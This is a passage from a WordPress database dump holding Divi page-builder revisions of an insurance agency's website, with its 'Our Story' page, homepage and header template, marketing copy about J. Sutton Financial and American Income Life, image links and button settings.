</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-03 23:02:53','2023-04-03 23:02:53','',528,'http://cmdev-site1.com/?p=687',0,'revision','',0),(700,1,'2023-04-03 23:18:08','2023-04-03 23:18:08','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-11px|||||\" custom_padding=\"2px||4px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" background_enable_image=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|0px|auto|false|false\" custom_padding=\"0px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" custom_margin=\"||||false|false\" custom_padding=\"30px||||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 23:18:08','2023-04-03 23:18:08','',26,'http://cmdev-site1.com/?p=700',0,'revision','',0),(688,1,'2023-04-03 23:02:53','2023-04-03 23:02:53','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" custom_margin=\"-11px|||||\" custom_padding=\"364px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"1px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 23:02:53','2023-04-03 23:02:53','',26,'http://cmdev-site1.com/?p=688',0,'revision','',0),(689,1,'2023-04-03 23:04:10','2023-04-03 23:04:10','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"417.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-03 23:04:10','2023-04-03 23:04:10','',528,'http://cmdev-site1.com/?p=689',0,'revision','',0),(734,1,'2023-04-03 23:51:30','2023-04-03 23:51:30','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||12px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" global_colors_info=\"{}\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" 